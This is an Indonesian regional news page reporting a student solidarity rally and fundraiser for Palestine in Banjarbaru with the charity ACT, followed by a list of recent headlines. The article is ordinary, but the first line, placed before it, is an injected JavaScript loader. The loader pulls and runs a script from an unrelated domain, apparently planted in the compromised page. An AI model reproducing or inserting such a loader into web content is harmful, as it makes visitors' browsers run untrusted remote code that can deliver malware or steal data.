(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Aksi Solidaritas untuk Palestina ACT Bersama Mahasiswa


BANJARBARU, Tewasnya 58 warga Palestina akibat aksi biadab tantara Israel menjadi catata paling kelam bagi warga Gaza sejak serangan ke Gaza tahun 2014. Protes panjang enam pekan berturut-turut dimulai oleh warga Gaza dengan tajuk The Great Return of March atau yang disebut juga dengan Nakba Day.

Di antara emosi dan duka mendalam bangsa Palestina, dukungan disampaikan anak muda di Kota Banjarbaru, yang bersatu dalam sebuah aksi solidaritas untuk Palestina, Jumat (18/5). Bersama Aksi Cepat Tanggap (ACT) Cabang Kalsel, puluhan pemuda yang berasal dari enam organisasi berbeda itu tumpah ruah di kawasan Taman Van Der Pijl Banjarbaru.

Mereka adalah KAMMI Banjarbaru, Sahabat Peduli Nusantara (SPN), Perkumpulan Mahasiswa Peduli Sosial (PMPS) Banjarbaru, Forum Lingkar Pena (FLP) Banjarbaru, Karang Taruna Banyu Langit, dan FSLDK Kalsel.

“Yang turun aksi hari ini  ada sekitar 50 orang, rencananya aksi berlangsung juga besok sore,” ungkap Yogik Irawan dari KAMMI Daerah Banjarbaru yang ditunjuk sebagai korlap aksi.

Dalam orasi, Yogik mengimbau kepada warga Kalsel dan Banjarbaru khususnya untuk menunjukan kepedulian kepada rakyat Palestina yang sedang tertindas.

“Kemerdekaan adalah hak semua bangsa, maka mari kita menolong perjuangan Palestina baik berupa materi ataupun mengirimkan doa terbaik untuk meringankan beban sosial dan beban ekonomi akibat kekejaman Israel,” ujar Yogik.

Sementara itu, Resyita Dewi Aminah, mahasiswi ULM yang ikut terlibat dalam aksi tersebut mengaku prihatin dengan kondisi rakyat Palestina yang berjuang mempertaruhkan nyawa untuk melindungi negara dan sanak keluarga.

“Menolong itu tidak harus pilih kasih, bantu saja selama kita mampu. Mungkin ini tak seberapa tapi semoga bisa menambah semangat mereka dalam berjuang,” ungkapnya.

Dalam aksi tersebut juga dilakukan penggalangan dana, doa bersama, dan pembacaan puisi. Semua hasil penggalangan dana akan disalurkan melalui lembaga kemanusiaan global ACT yang saat ini telah memiliki kantor cabang Kalsel di Banjarmasin.

Maidinoor, Kepala Cabang ACT Kalsel mengapresiasi aksi tersebut. “Saya bangga dengan gelora semangat generasi muda ini, semoga ini menjadi jalan untuk memberikan Ramadhan kali ini ikhtiar terbaik untuk kemanusiaan,” ucapnya.

Dia menyampaikan bahwa berbagai bantuan bangsa Indonesia yang dan melalui ACT sudah diberikan untuk rakyat Palestina. “ACT telah mengirimkan 2000 ton beras melalui kapal kemanusiaan Palestina awal tahun yang lalu, juga ada posko medis ACT yang dibangun di perbatasan Gaza-Israel,” sebut Maidinoor. (Desy)

Reporter:Desy
Editor:Abi Zarrin Al Ghifari

Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

32 menit ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

52 menit ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

1 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

2 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

2 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

2 jam ago

This website uses cookies.